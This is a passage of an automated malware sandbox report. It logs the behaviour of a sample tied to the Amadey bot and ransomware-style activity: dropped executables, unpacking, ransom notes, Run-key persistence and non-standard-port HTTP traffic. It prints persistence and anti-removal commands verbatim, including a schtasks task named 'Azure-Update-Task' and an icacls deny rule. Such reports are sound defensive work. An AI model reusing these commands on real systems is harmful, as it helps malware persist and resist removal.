Source: C:\Users\user\AppData\Local\Temp\B46F.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\A170.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\A170.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\913F.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\913F.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\3C54.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\01860199.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: 01860199.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 01860199.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 01860199.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 01860199.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 01860199.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 01860199.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 01860199.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: D804.exe, 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, B46F.exe, 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, B46F.exe, 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A170.exe, 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000001.00000000.378518677.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000001.00000000.378518677.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: helppane.pdb source: 3C54.exe, 00000014.00000002.507574434.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644812591.00007FF777031000.00000020.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: NewPlayer.exe, 00000016.00000002.476201608.0000000000091000.00000002.00000001.01000000.00000011.sdmp, NewPlayer.exe, 00000016.00000000.461052075.0000000000091000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\sucagidupusehi\pahopigap\5\muhoyawa.pdb source: 01860199.exe, 00000000.00000000.351185873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, hwgujdv, 00000004.00000000.433612531.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: AC:\sucagidupusehi\pahopigap\5\muhoyawa.pdb source: 01860199.exe, 00000000.00000000.351185873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, hwgujdv, 00000004.00000000.433612531.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: TEST_mi_exe_stub.pdb source: D804.exe, 00000013.00000003.473635062.0000000009A20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\huvuvig\juhohan\bamakexuvoni\vaxilil\javefi\5\liguvihahoca\suci.pdb source: explorer.exe, 00000001.00000003.439363024.0000000005973000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.438814937.00000000157FF000.00000004.00000010.00020000.00000000.sdmp, D804.exe
Source:	Binary string: CGC:\huvuvig\juhohan\bamakexuvoni\vaxilil\javefi\5\liguvihahoca\suci.pdb source: explorer.exe, 00000001.00000003.439363024.0000000005973000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.438814937.00000000157FF000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: D804.exe, 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, B46F.exe, 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, B46F.exe, 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A170.exe, 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: eex.pdb source: explorer.exe, 00000001.00000000.378518677.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: )5C:\rusuxenalo\dutaz jale\puyenotak\tipibu.pdb source: explorer.exe, 00000001.00000003.443261343.0000000005975000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.443214371.0000000008581000.00000004.00000001.00020000.00000000.sdmp, C861.exe, 00000007.00000000.443424351.0000000000401000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\rusuxenalo\dutaz jale\puyenotak\tipibu.pdb source: explorer.exe, 00000001.00000003.443261343.0000000005975000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.443214371.0000000008581000.00000004.00000001.00020000.00000000.sdmp, C861.exe, 00000007.00000000.443424351.0000000000401000.00000020.00000001.01000000.00000009.sdmp

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\D804.exe	Unpacked PE file: 6.2.D804.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	Unpacked PE file: 16.2.D804.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Unpacked PE file: 19.2.D804.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Unpacked PE file: 26.2.B46F.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\A170.exe	Unpacked PE file: 29.2.A170.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	Unpacked PE file: 31.2.D804.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	Unpacked PE file: 32.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\913F.exe	Unpacked PE file: 37.2.913F.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\01860199.exe	Unpacked PE file: 0.2.01860199.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\hwgujdv	Unpacked PE file: 4.2.hwgujdv.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Unpacked PE file: 6.2.D804.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\C861.exe	Unpacked PE file: 7.2.C861.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	Unpacked PE file: 16.2.D804.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Unpacked PE file: 19.2.D804.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Unpacked PE file: 26.2.B46F.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\A170.exe	Unpacked PE file: 29.2.A170.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	Unpacked PE file: 31.2.D804.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	Unpacked PE file: 32.2.build2.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\913F.exe	Unpacked PE file: 37.2.913F.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\F4F7.exe	Unpacked PE file: 38.2.F4F7.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;

Source: C:\Users\user\Desktop\01860199.exe	Code function: 0_2_0040C757 push ebx; ret
Source: C:\Users\user\AppData\Roaming\hwgujdv	Code function: 4_2_0040C757 push ebx; ret
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Code function: 5_2_00407449 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Code function: 5_2_00403770 push ecx; mov dword ptr [esp], 00000000h
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Code function: 5_2_024A80AF push ecx; retf

Source: C:\Users\user\AppData\Local\Temp\D804.exe

Code function: 5_2_0040D6B0 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

Source: XandETC.exe.20.dr	Static PE information: section name: .xdata
Source: cred64[1].dll.35.dr	Static PE information: section name: _RDATA
Source: cred64.dll.35.dr	Static PE information: section name: _RDATA

Source: cred64.dll.35.dr	Static PE information: real checksum: 0x0 should be: 0x10ec1f
Source: build3[1].exe.19.dr	Static PE information: real checksum: 0x0 should be: 0x3ca6
Source: mnolyk.exe.22.dr	Static PE information: real checksum: 0x0 should be: 0x462b6
Source: NewPlayer.exe.20.dr	Static PE information: real checksum: 0x0 should be: 0x462b6
Source: 5DA0.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x4e4913
Source: aafg31.exe.20.dr	Static PE information: real checksum: 0xfc51b should be: 0xfd56a
Source: mstsca.exe.30.dr	Static PE information: real checksum: 0x0 should be: 0x3ca6
Source: 6FA9.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x4e4913
Source: 3C54.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x4e4913
Source: 9F31.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x4e4913
Source: cred64[1].dll.35.dr	Static PE information: real checksum: 0x0 should be: 0x10ec1f
Source: build3.exe.19.dr	Static PE information: real checksum: 0x0 should be: 0x3ca6

Source: initial sample	Static PE information: section name: .text entropy: 7.582759753211569
Source: initial sample	Static PE information: section name: .text entropy: 7.957132142496877
Source: initial sample	Static PE information: section name: .text entropy: 7.5847412014460565
Source: initial sample	Static PE information: section name: .text entropy: 7.957132142496877
Source: initial sample	Static PE information: section name: .text entropy: 7.5847412014460565
Source: initial sample	Static PE information: section name: .text entropy: 7.956564628368373
Source: initial sample	Static PE information: section name: .text entropy: 7.957132142496877
Source: initial sample	Static PE information: section name: .text entropy: 7.956564628368373
Source: initial sample	Static PE information: section name: .text entropy: 7.956564628368373
Source: initial sample	Static PE information: section name: .text entropy: 7.5847412014460565
Source: initial sample	Static PE information: section name: .text entropy: 7.957132142496877
Source: initial sample	Static PE information: section name: .text entropy: 7.956564628368373
Source: initial sample	Static PE information: section name: .text entropy: 7.5847412014460565
Source: initial sample	Static PE information: section name: .text entropy: 7.957132142496877
Source: initial sample	Static PE information: section name: .text entropy: 7.890261806957562
Source: initial sample	Static PE information: section name: .text entropy: 7.9249481955685654
Source: initial sample	Static PE information: section name: .text entropy: 7.956564628368373
Source: initial sample	Static PE information: section name: .text entropy: 7.582759753211569
Source: initial sample	Static PE information: section name: .text entropy: 7.5847412014460565
Source: initial sample	Static PE information: section name: .text entropy: 7.957132142496877

Persistence and Installation Behavior

Yara detected Amadey bot

Source: Yara match	File source: 00000023.00000003.612344653.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.618034875.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.520904242.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.520904242.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.618034875.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.618034875.0000000000BE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hwgujdv			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ewgujdv			Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\D689.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File created: C:\Users\user\Downloads\ChromeSetup.exe.vapo (copy)
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\EA44.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\BC2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\6FA9.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\673.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hwgujdv	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\A170.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File created: C:\Users\user\Downloads\ChromeSetup.exe
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\3E02.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\CBE6.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ewgujdv	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\F4F7.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\57DC.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C861.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\3C54.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\NewPlayer.exe	File created: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	File created: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\A3D5.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\D804.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\B46F.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\913F.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\B8C8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	File created: C:\Users\user\AppData\Local\Temp\aafg31.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	File created: C:\Users\user\AppData\Local\Temp\XandETC.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\5DA0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	File created: C:\Users\user\AppData\Local\Temp\NewPlayer.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9F31.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\388B.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\D804.exe	File created: C:\_readme.txt
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File created: C:\Users\user\_readme.txt

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe

Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Source: C:\Users\user\AppData\Local\Temp\D804.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50032

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\01860199.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\hwgujdv:Zone.Identifier read attributes \| delete
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\ewgujdv:Zone.Identifier read attributes \| delete

Source: C:\Users\user\AppData\Local\Temp\D804.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
